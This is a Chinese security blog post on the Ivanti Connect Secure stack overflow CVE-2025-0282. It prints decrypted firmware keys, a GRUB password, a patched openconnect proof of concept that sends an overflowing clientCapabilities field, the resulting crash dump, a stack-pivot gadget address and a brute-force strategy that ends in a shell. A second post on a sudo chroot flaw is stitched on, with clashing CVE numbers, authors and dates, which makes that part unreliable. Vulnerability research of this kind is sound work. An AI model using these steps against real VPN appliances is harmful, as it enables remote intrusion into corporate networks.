https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day/

1月10日 watchtowr 就发布了漏洞分析

https://labs.watchtowr.com/do-secure-by-design-pledges-come-with-stickers-ivanti-connect-secure-rce-cve-2025-0282/

1月10日我也发了我的漏洞复现推特： https://x.com/bestswngs/status/1877715807506952486

这次 diff版本2.3 build 3431 和 2.5，特意留到了除夕夜发这篇文章..

固件提取

这部分内容依旧感谢我的同事 @explore 和 @leommxj的帮助，具体流程如下：

添加磁盘到虚拟机里后，用 lvdisplay 可以看到几个分区

──(root㉿kali)-[/home/kali/Desktop]
└─# lvdisplay
--- Logical volume ---
LV Path                /dev/groupA/home
LV Name                home
VG Name                groupA
LV UUID                vPWDHH-AlTq-GvBS-UAnf-orT1-yT2d-TdbWyK
LV Write Access        read/write
LV Creation host, time (none), 2025-01-09 17:28:21 -0500
LV Status              NOT available
LV Size                <4.87 GiB
Current LE             1246
Segments               1
Allocation             inherit
Read ahead sectors     auto

--- Logical volume ---
LV Path                /dev/groupA/runtime
LV Name                runtime
VG Name                groupA
LV UUID                dFDVOl-kYQR-J3N5-3HNC-toXc-9947-sj0yzc
LV Write Access        read/write
LV Creation host, time (none), 2025-01-09 17:28:39 -0500
LV Status              NOT available
LV Size                <19.46 GiB
Current LE             4981
Segments               2
Allocation             inherit
Read ahead sectors     auto

--- Logical volume ---
LV Path                /dev/groupZ/home
LV Name                home
VG Name                groupZ
LV UUID                cOTBS1-oaYw-PlAt-puTS-Uvq5-6C91-pK6QHK
LV Write Access        read/write
LV Creation host, time (none), 2024-10-07 06:47:49 -0400
LV Status              NOT available
LV Size                6.72 GiB
Current LE             1721
Segments               1
Allocation             inherit
Read ahead sectors     auto

可以看到这几个都是 lvm2 加密的，没法直接 mount

┌──(root㉿kali)-[/home/kali/Desktop]
└─# fdisk -l
Disk /dev/sdb: 80.09 GiB, 86000000000 bytes, 167968750 sectors
Disk model: VMware Virtual S
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xc45d0b27

Device     Boot Start       End   Sectors  Size Id Type
/dev/sdb1  *     2048 167968749 167966702 80.1G 83 Linux


Disk /dev/sda: 80 GiB, 85899345920 bytes, 167772160 sectors
Disk model: VMware Virtual S
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00000000

Device     Boot     Start       End   Sectors  Size Id Type
/dev/sda1           16065    224909    208845  102M 83 Linux
/dev/sda2          224910    433754    208845  102M 83 Linux
/dev/sda3          449820    658664    208845  102M 83 Linux
/dev/sda4          674730 167766794 167092065 79.7G 85 Linux extended
/dev/sda5          674731  14779799  14105069  6.7G 83 Linux
/dev/sda6        14779801  30089744  15309944  7.3G 83 Linux
/dev/sda7        30089746  65802239  35712494   17G 83 Linux
/dev/sda8        65802241  81112184  15309944  7.3G 83 Linux
/dev/sda9        81112186 116824679  35712494   17G 83 Linux
/dev/sda10      116824681 132134624  15309944  7.3G 82 Linux swap / Solaris
/dev/sda11      132134626 167766794  35632169   17G 83 Linux

┌──(root㉿kali)-[/home/kali/Desktop]
└─# mount /dev/groupZ/home /mnt/runtime

┌──(root㉿kali)-[/home/kali/Desktop]
└─# mount /dev/sda1 /mnt/runtime

┌──(root㉿kali)-[/home/kali/Desktop]
└─# ls /mnt/runtime
boot.b  compact-file  coreboot.img  disksize  grub  kernel  log_coreboot  lost+found  VERSION

我们在 /dev/sda1 找到了对应的 kernel 和 coreboot.img，可以看看到 coreboot.img 作为initrd

└─# cat /mnt/runtime/grub/grub.cfg
set default=0
set timeout=5
insmod ext2
password 07ow3w3d743
serial --unit=0 --speed=9600 --word=8 --parity=no --stop=1
menuentry "Current" {
set root=(hd0,2)
linux /kernel system=A rootdelay=5 console=ttyS0,115200n8 console=tty0 vm_hv_type=VMware
initrd /coreboot.img
}
menuentry "Factory Reset" {
set root=(hd0,1)
linux /kernel system=Z noconfirm rootdelay=5 console=ttyS0,115200n8 console=tty0 vm_hv_type=VMware
initrd /coreboot.img
}

decrypt

coreboot.img 作为initrd

我们去将这里的 kernel 通过 vmlinux-to-elf 转换一下就可以逆向了，在 kernel中populate_rootfs里面写死密钥的AES解密

>>>DRAMFS_AES_KEY = bytes.fromhex("13D7B32E2600B7747D80FBA8F8D5C7CA")
>>>
>>>realkey = strxor(DRAMFS_AES_KEY[:4][::-1], bytes.fromhex('99ED2BF2'))[::-1]
2 realkey += strxor(DRAMFS_AES_KEY[4:8][::-1], bytes.fromhex('AEEF41FE'))[::-1]
3 realkey += strxor(DRAMFS_AES_KEY[8:12][::-1], bytes.fromhex('141058C7'))[::-1]
4 realkey += strxor(DRAMFS_AES_KEY[12:16][::-1], bytes.fromhex('D2ED180E'))[::-1]
>>>realkey
b'\xe1\xfc^\xb7\xd8AX\xda\xba\xd8\xeb\xbc\xf6\xcd*\x18'

binary ninja 带有神奇的优化，

优化出来就是异或完的

ffffffff826d0815            int64_t initrd_start_3 = initrd_start;
ffffffff826d081c            int32_t initrd_end_1 = (*(uint32_t*)initrd_end);
ffffffff826d082e            int64_t* rax_1 = crypto_alloc_base("aes", 0, 0);
ffffffff826d0833            uint64_t i = (uint64_t)(initrd_end_1 - initrd_start_3);
ffffffff826d083f            int64_t rcx_1;
ffffffff826d083f            int64_t rdx_1;
ffffffff826d083f            int64_t r8_1;
ffffffff826d083f
ffffffff826d083f            if (rax_1 <= -0x1000)
ffffffff826d083f{
ffffffff826d0875                int32_t var_6c_1 = 0xda5841d8;
ffffffff826d0889                int32_t var_70 = 0xb75efce1;
ffffffff826d088c                int32_t var_68_1 = 0xbcebd8ba;
ffffffff826d088f                int32_t var_64_1 = 0x182acdf6;
ffffffff826d089b                rcx_1 = rax_1[1](rax_1, &var_70, 0x10);
ffffffff826d089f                int32_t rax_2 = 0;

通过简单的逆向，我们很快就可以写出一份解密代码，我们可以把 coreboot.img 解密后出来一份gzip 压缩的cpio文件。

# swing @ sw in ~/Dropbox/Attachments/SafetyEquipment/VPN/ivc/2.3 [17:53:53]
$ file out2.bak
out2.bak: gzip compressed data, last modified: Sat Oct  5 17:32:45 2024, max compression, from Unix, original size modulo 2^32 118361088

# swing @ sw in ~/Dropbox/Attachments/SafetyEquipment/VPN/ivc/2.3 [17:53:49]
$ gzip -d out2.gz

$ file out2
out2: ASCII cpio archive (SVR4 with no CRC)

cpio 解出来的目录结构如下：

1
2
3

# swing @ sw in ~/Dropbox/Attachments/SafetyEquipment/VPN/ivc/2.3/initrd [17:55:34]
$ ls
bin     dash    dev     etc     gzip    insmod  lib     modules out2    rmmod   sbin    tmp     usr

etc/lvmeky 是其他上面几个 lvm 分区的 key , 使用 crypsetup 命令解密后可以进一步 mount 磁盘

1 2	sudo cryptsetup luksOpen --key-file /mnt/hgfs/G/chaitin/20250109_ivanti/ISA_R2.3/lvmkey /dev/groupA/home groupA_home sudo mount /dev/mapper/groupA_home /mnt/disk1

shell 获取

/root/home/bin/dsconfig.pl 是进入后的shell
其中如果DSSys::isDebugBuild 返回是调试版本就会直接给出shell的选项

这里就是会调用 sub shell {} 方法

sub shell{
return "" if (!DSSys::isDebugBuild());
print "set DISPLAY variable if you want to start an xterm\n";

my ($install) = $ENV{'DSINSTALL'} =~ /(\S*)/;
DSSafe::system("$install/bin/dsshell");

return "";
}

通过简单逆向这个程序，我们就很快能获得一个带有调试功能的固件了（具体操作留给读者了，很简单）

CVE-2025-0282

Diff patched

可以看到这里新加了一个长度判断，之前存在栈溢出

memset(dest, 0, sizeof(dest));
strncpy(dest, *(const char **)(a1 + 140), v23);
v24 = 46;
v25 = &v57;
if ( ((unsigned __int8)&v57 & 2) != 0 )
{
LOBYTE(v24) = 44;
v57 = 0;
v25 = (__int16 *)&v58;
}

PoC

最早的poc构造是根据 watchtowr 的文章，魔改 openconnect^[1] 的 pulse.c 代码

if (bytes[0])
buf_append(reqbuf, " clientIp=%s", bytes);
+ buf_append(reqbuf, " clientCapabilities=%s", bytes);
+ for(unsigned int n=0; n<100; n++)
+       buf_append(reqbuf, "AAAAAAAAAAAAAAAA");
buf_append(reqbuf, "\\n%c", 0);
ret = send_ift_packet(vpninfo, reqbuf);

编译的时候需要一个 vpn.cript , 我这里用的是 https://gitlab.com/openconnect/vpnc-scripts/-/blob/master/vpnc-script?ref_type=heads

1	/configure --enable-static=yes --without-openssl --with-vpnc-script=./vpnc-script --without-libproxy --without-lz4

poc

$ ./openconnect 172.16.64.222 --protocol=pulse --dump-http-traffic -vvv
Attempting to connect to server 172.16.64.222:443
Connected to 172.16.64.222:443
SSL negotiation with 172.16.64.222
Server certificate verify failed: signer not found

Certificate from VPN server "172.16.64.222" failed verification.
Reason:signer not found
To trust this server in future, perhaps add this to your command line:
--servercert pin-sha256:4fW+U987xNSV4e/eojrHz/Cr1pGxIIF0lraaXwBKQ2A=
Enter 'yes' to accept, 'no' to abort; anything else to view: yes
Connected to HTTPS on 172.16.64.222 with ciphersuite (TLS1.2)-(RSA)-(AES-256-GCM)
> GET / HTTP/1.1
> Host: 172.16.64.222
> User-Agent: Open AnyConnect VPN Agent v9.12-unknown
> Content-Type: EAP
> Upgrade: IF-T/TLS 1.0
> Content-Length: 0
>
Got HTTP response: HTTP/1.1 101 Switching Protocols
Content-type:application/octet-stream
Pragma:no-cache
Upgrade:IF-T/TLS 1.0
Connection:Upgrade
HC_HMAC_VERSION_COOKIE: 1
supportSHA2Signature:1
Strict-Transport-Security:max-age=31536000
accept-ch:Sec-CH-UA-Platform-Version
> 0000:  00 00 55 97 00 00 00 01  00 00 00 14 00 00 00 00  |..U.............|
> 0010:  00 01 02 02                                       |....|
Read 20 bytes of IF-T/TLS record
< 0000:  00 00 55 97 00 00 00 02  00 00 00 14 00 00 01 f5  |..U.............|
< 0010:  00 00 00 02                                       |....|
IF-T/TLS version from server: 2
> 0000:  00 00 0a 4c 00 00 00 88  00 00 06 a1 00 00 00 01  |...L............|
> 0010:  63 6c 69 65 6e 74 48 6f  73 74 4e 61 6d 65 3d 75  |clientHostName=u|
> 0020:  62 75 6e 74 75 20 63 6c  69 65 6e 74 49 70 3d 31  |buntu clientIp=1|
> 0030:  39 38 2e 31 39 2e 32 34  39 2e 31 38 38 20 63 6c  |98.19.249.188 cl|
> 0040:  69 65 6e 74 43 61 70 61  62 69 6c 69 74 69 65 73  |ientCapabilities|
> 0050:  3d 31 39 38 2e 31 39 2e  32 34 39 2e 31 38 38 41  |=198.19.249.188A|
> 0060:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0070:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0080:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0090:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 00a0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 00b0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 00c0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 00d0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 00e0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 00f0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0100:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0110:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0120:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0130:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0140:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0150:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0160:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0170:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0180:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0190:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 01a0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 01b0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 01c0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 01d0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 01e0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 01f0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0200:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0210:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0220:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0230:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0240:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0250:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0260:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0270:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0280:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0290:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 02a0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 02b0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 02c0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 02d0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 02e0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 02f0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0300:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0310:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0320:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0330:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0340:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0350:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0360:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0370:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0380:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0390:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 03a0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 03b0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 03c0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 03d0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 03e0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 03f0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0400:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0410:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0420:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0430:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0440:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0450:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0460:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0470:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0480:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0490:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 04a0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 04b0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 04c0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 04d0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 04e0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 04f0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0500:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0510:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0520:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0530:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0540:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0550:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0560:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0570:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0580:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0590:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 05a0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 05b0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 05c0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 05d0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 05e0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 05f0:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0600:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0610:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0620:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0630:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0640:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0650:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0660:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0670:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0680:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
> 0690:  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 0a  |AAAAAAAAAAAAAAA.|
> 06a0:  00                                                |.|
Read 20 bytes of IF-T/TLS record
< 0000:  00 00 55 97 00 00 00 05  00 00 00 14 00 00 01 f6  |..U.............|
< 0010:  00 0a 4c 01                                       |..L.|
> 0000:  00 00 55 97 00 00 00 06  00 00 00 22 00 00 00 02  |..U........"....|
> 0010:  00 0a 4c 01 02 01 00 0e  01 61 6e 6f 6e 79 6d 6f  |..L......anonymo|
> 0020:  75 73                                             |us|

可以看到构超级长的 ientCapabilities 参数的时候就会栈溢出

free 的崩溃现场

Program received signal SIGSEGV, Segmentation fault.
eax            0x0      0
edi            0xff856370       -8035472
esi            0x1      1
edx            0xf1a8d004       -240594940
=> 0xf4f73d1d <free+45>:        mov    esi,DWORD PTR [ecx-0x4]
0xf4f73d20 <free+48>:        lea    edx,[ecx-0x8]
0xf4f73d23 <free+51>:        test   esi,0x2
0xf4f73d29 <free+57>:        jne    0xf4f73d58 <free+104>
0xf4f73d2b <free+59>:        and    esi,0x4
0xff856110:     0x56723200      0x566dd509      0x566ecbc7      0xf4f73cf8
0xff856120:     0xf7a26000      0x00000001      0xff856370      0xf6d6535f
0xff856130:     0x41414141      0x00000032      0xf7f3abc9      0x5671d000
0xff856140:     0x5671d000      0x56723200      0x00000001      0x5669a4e8
0xff856150:     0xff856370      0x00000289      0x566ed87c      0x566d7c7f
0xf4f73d1d in free () from /lib/libc.so.6
(gdb) bt
#0  0xf4f73d1d in free () from /lib/libc.so.6
#1  0xf6d6535f in DSUtilMemPool::~DSUtilMemPool() () from /home/ecbuilds/int-rel/sa/22.7/bld3431.1/install/lib/libdsplibs.so
#2  0x5669a4e8 in ?? ()
#3  0x5669ae7b in ?? ()
#4  0xf5fd0565 in IftTlsParser::parse(unsigned char const*, unsigned int) () from /home/ecbuilds/int-rel/sa/22.7/bld3431.1/install/lib/libdsagentd.so
#5  0xf5fd084e in IftTlsParser::parseData(unsigned char const*, unsigned int) () from /home/ecbuilds/int-rel/sa/22.7/bld3431.1/install/lib/libdsagentd.so
#6  0x56696e48 in ?? ()
#7  0x566133d5 in ?? ()
#8  0x56614446 in ?? ()
#9  0x56614d40 in ?? ()
#10 0xf6c4942e in ?? () from /home/ecbuilds/int-rel/sa/22.7/bld3431.1/install/lib/libdsplibs.so
#11 0xf6c49f2f in DSEvntFds::runDispatcher() () from /home/ecbuilds/int-rel/sa/22.7/bld3431.1/install/lib/libdsplibs.so
#12 0x5663f477 in ?? ()
#13 0x565e0a37 in main ()
(gdb) p/x 0x5669a4e8  - $base
$1 = 0xe54e8
(gdb) i er ecx
Undefined info command: "er ecx".  Try "help info".
(gdb) i r ecx
ecx            0x41414141       1094795585
(gdb)

void __cdecl EPMessage::~EPMessage(EPMessage *this)
{
DSHash::~DSHash((EPMessage *)((char *)this + 4));
}

0xf6d0fb31 in DSHash::~DSHash() () from /home/ecbuilds/int-rel/sa/22.7/bld3431.1/install/lib/libdsplibs.so

exploit

memset(dest, 0, sizeof(dest));
strncpy(dest, (const char *)a1->clientCapabilities, v23);// overflow
v24 = 46;
v25 = &v57;
if ( ((unsigned __int8)&v57 & 2) != 0 )
{
LOBYTE(v24) = 44;
v57 = 0;
v25 = (__int16 *)&v58;
}
memset(v25, 0, 4 * (v24 >> 2));
v26 = &v25[2 * (v24 >> 2)];
if ( (v24 & 2) != 0 )
*v26 = 0;
na = 46;
(*(void (__cdecl **)(struct_a1 *, __int16 *))(*(_DWORD *)a1->gap0 + 72))(a1, &v57);

在溢出之后有一个函数指针的调用

mov     edx, [esp+0A0Ch+var_9E0]
mov     eax, [esp+2576]
mov     eax, [eax]
mov     [esp+0A0Ch+src], edx
; 395:     na = 46;
mov     edx, [esp+0A0Ch+arg_0]
mov     [esp+0A0Ch+n], 2Eh ; '.' ; int
mov     [esp+0A0Ch+var_A0C], edx
call    dword ptr [eax+48h]

这里是一个this 指针调用虚表函数的功能，由于虚表指针在栈上，这个栈是可以被我们覆盖的，所以我们大概率就是需要找到一个虚表指针，他指向的虚表函数表，这个表 +0x48 能有合适的gadget，我一开始的思路是去找所有的虚表定义，看看有没有合适的，可惜我没有找到，于是我回到 https://labs.watchtowr.com/exploitation-walkthrough-and-techniques-ivanti-connect-secure-rce-cve-2025-0282/ 这个文章^[2]，观察这个作者的 A Gadget From The Gods ，最后我用的大概率也是做这个找到的这个gadget

在这文章^[2]中作者提到了他的 gadget 的具体汇编，第一句是mov ebx, 0xfffffff0 ，第二句是 add esp, 0x204C

+--------------------------+
| gadget_0[0x48]           |
+--------------------------+
| mov ebx, 0xfffffff0      | <- Load value into EBX
+--------------------------+
| add esp, 0x204C          | <- Adjust stack pointer
+--------------------------+
| mov eax, ebx             | <- Copy EBX to EAX
+--------------------------+
| pop ebx                  | <- Restore EBX
+--------------------------+
| pop esi                  | <- Restore ESI
+--------------------------+
| pop edi                  | <- Restore EDI
+--------------------------+
| pop ebp                  | <- Restore EBP
+--------------------------+
| ret                      | <- Return to caller
+--------------------------+

于是我采用了一个最笨的方法，将所有引用的 lib 库全部objdump 一遍，然后去grep

1
2
3

objdump --x86-asm-syntax=intel -D  $(find . -name "libagentdcs.so") 2>&1 > libagentdcs.so.so.txt

cat ibdsplibs.txt|grep -e "add\tesp, 0x204c"

在libdsplibs.so 的 0x93849C 地址找到了这个 gadget ，意料之外的是这里具体居然是个 swithc table 表

按照代码逻辑，我们只要反着算就行，例如我们这里最后 vtable 的地址是 0x11D8940，那么就需要有一个地址存储这个指针，直接在 ida 的binary search 里搜索

找到一个这个，所以我们最后要覆盖的this 指针地址为 0x00934F4C，后面正常 rop 就行，这里提一句 libc的随机化是 0xfff 位，多核启动的时候会有一个主进程不断的fork子进程，因此我们爆破 0xfff次就一定能成功执行

拿到的权限是 nr 权限

bash-4.2$ id
id
uid=104(nr) gid=104(nr) groups=104(nr) context=system_u:system_r:kernel_t:s0
bash-4.2$

完整的ROP链也留给读者实现了。

Reference link

1.OpenConnect https://www.infradead.org/openconnect/download.html↩
2.https://labs.watchtowr.com/exploitation-walkthrough-and-techniques-ivanti-connect-secure-rce-cve-2025-0282/↩

CVE-2025-36463 Sudo_chroot Elevation of Privilege 漏洞分析

作者: 纯情
时间: 2026-01-20
分类: 资讯
评论

CVE-2025-36463 Sudo_chroot Elevation of Privilege 漏洞分析

Swing

2025-07-02

漏洞分析

CVE-CVE-2025-3246, sudo

TL; DR

startascale 6 月 30 日发布了几个 sudo 的提权漏洞，CVE-CVE-2025-32463^[1] 是其中一个，另外一个 CVE-2025-32462^[2] 需要一个特殊配置。

该漏洞依赖于 Sudo 规则被限制在特定主机名或主机名模式的配置场景下。如果满足这些条件，权限提升到 root 无需任何漏洞利用（exploit）。

漏洞分析

CVE-2025-32463在Sudo v1.9.14（2023年6月）中引入（https://github.com/sudo-project/sudo/blob/SUDO_1_9_14/NEWS），在使用chroot功能时，更新了命令匹配处理代码。本文漏洞分析的sudo代码 commit 为： cb3355e9d4f66db642b9c0e9151423762504339b

该代码逻辑在， plugins/sudoers/sudoers.c 文件中的 set_cmnd_path 函数里，

int
set_cmnd_path(struct sudoers_context *ctx, const char *runchroot)
{
...
/* Pivot root. */
if (runchroot != NULL) {
if (!pivot_root(runchroot, &pivot_state))
goto error;
}
...
ret = resolve_cmnd(ctx, cmnd_in, &cmnd_out, path);
...
if (runchroot != NULL)
(void)unpivot_root(&pivot_state);
...

代码逻辑大致是:
1. pivot_root 函数进行 chroot 2. resolve_cmnd函数去进行命令的匹配查找路径 3. 最后unpivot_root` chroot 回到原来的 root path

漏洞的发生点其实就是在 pivot_root 和 unpivot_root 之间，有代码逻辑去读取 /etc/nsswitch.conf 文件并进行了 nss_database* 的更新。

